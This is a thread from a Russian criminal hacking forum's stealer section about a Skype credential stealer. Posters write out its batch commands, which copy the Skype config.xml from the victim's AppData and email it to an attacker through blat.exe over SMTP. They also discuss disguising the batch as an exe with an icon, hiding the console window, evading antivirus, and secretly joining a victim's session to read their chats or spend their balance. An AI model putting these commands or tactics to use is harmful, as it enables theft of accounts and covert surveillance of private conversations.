1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Skype stealer

Тема в разделе "Кейлоггеры | Стиллеры | Грабберы", создана пользователем ErrorNick, 29 июл 2012.

1. TopicStarter Overlay
    ErrorNick

ErrorNick

Симпатии:
    55
    Простой стиллер кражи паролей от программы Skype. Программа создаёт билд с маленьким размером, и с не традиционным расширением для стиллеров: *.bat
    Программа отправляет данные на почту, простые настройки.
    СКАЧАТЬ:
    Please login or register to view links

Сам не юзал...на сколько актуален не знаю.

--- добавлено: 29 июл 2012 в 20:58 ---
    мда стиллер не ахти, прет файл конфига через блат посылает по smtp (жесть)

батник лиш дает параметры для запуска блат.exe а значит что эти 2 файла должны лежать рядом(winrar в помощ)

Параметры для запука блата
    copy %appdata%\Skype\я так понял тут логин и его надо знать\config.xml config.xml - тут копирует файл конфига скайпа и дальше отправка.
    :send
    blat.exe -install -server smtp.yandex.ru -port 587 -f ******@yandex.ru -u ***** -pw тут pass
    blat.exe -body text -to сюда шлет@mail.ru -attach config.xml

Что на счет конфига я так понял его легче заменить на свой, и войти в скайп не зная паса, где в конфиге хранится пас я хз.

В архие так же Bat_To_Exe_Converter1,5,1.exe < нах? не пойму когда в бат файле 3 строчки тут не какой авирь не запалит,ну я не чекал...короч его на мой взгляд ваще стоит снести.
    --- добавлено: 29 июл 2012 в 21:10 ---
    не досмотрел, blat.lib blat.dll тоже рядышком, проще рата сбилдить, залезть по данному пути,
    appdata%\Skype\логин\config.xml

спереть файл конфига.

• Like Like x 3
    Метки:
  2. trojface

trojface Гость

Во первых к exe файлу можно и иконку приделать.
    Скомпилированный в exe батник командных окно не открывает.
    Конечно можно дописывать каждую строку в батнике,чтоб командное окно не открывалось ,но это лишний гемор.

3. TopicStarter Overlay
    ErrorNick

ErrorNick

Симпатии:
    55
    @Echo off :D а вобще на счет иконки...клея все винраром в sfx можно добавить иконку. это естественно в данном случаи, а когда чистый батник то да лучше конвертнуть.

4. teppopuct

teppopuct Гость

Хах,а зачем воровать скайп?O_o

5. KapJloCoH

KapJloCoH Гость

Если на балансе в скайпе есть денюшки,можно званить нахаляву :D

6. asyapak

asyapak Гость

в таком случае лучше скардить себе скайп дешевле и лучше обойдёться
    а вот кайф 1 есть в скайпе можно сидеть в паралельной сессии ))) то есть если ты сидишь на этом аке и жертва на нём же с кем то будет общаться то ты будешь читать их сообщения :D

7. Vlastelina

Vlastelina Гость

а зачем отдельный на скайп если можно простой стиллер на все впарить и там же будет пароль к скайпу

8. bios

bios

Симпатии:
    622
    от скайпа вроде пасс не сохраняется((

9. pavel0088

pavel0088 Гость

А его антивирус палит?

10. Enigma

Enigma Гость

если логиниться с оф.сайта,то сохранится.

11. bios

bios

Симпатии:
    622
    ну тогда можно сразу и стиллер

12. Vladimir

Vladimir Гость

кто это придумал?=))) воровать скайп - глупо)

13. andreas

andreas Гость

полностью согласен

14. NeeON

NeeON

Симпатии:
    386
    норм

• Like Like x 1
  15. bios

bios

Симпатии:
    622
    Код:
    Зачем флудить?

• Like Like x 1
  16. primetimewww

primetimewww Гость

Пацанны я нефига не понил.Кто может обьяснить skp(login) primetimewww если обьясните буду благодарин и денег поткину :)

17. viziter-msk

viziter-msk

Симпатии:
    59
    Чейто глупо? если кто то что то тырит, то не для смеха ради. Пас отскайпа нужен если есть подозрения или проблемв в отношении твоего круга общения. В отличии от аськи, в скайпе имея пас, можно подключиться параллельно к проге, и вместе с собственником ака в режиме онлайн видить что ему пишут, причем собственник никогда об этом параллельном сеансе не догадается. Тырельщик нужен, только не для всех.

18. primetimewww

primetimewww Гость

и ещё можно Взламать скайп кагонибудь ганата и тырить всё что ему присылают :)

19. viziter-msk

viziter-msk

Симпатии:
    59
    тырить не получится. Сам представь к тебе подключились параллельно, и твой товарищ тебе шлет файл, а кто то другой перехфватывает его. Фактически ты становишся уже наблюдателем, сам файл не нажимал принять а он уже отправляется. Отправка в таком случае только в одни ворота. Иначе палено.

20. primetimewww

primetimewww Гость

Не идеи есть перехватывать собщения друго человека но я не знаю как их перехватить.Будит возможно заработать много денег если перехватиш :)

Поделиться этой страницей

Загрузка...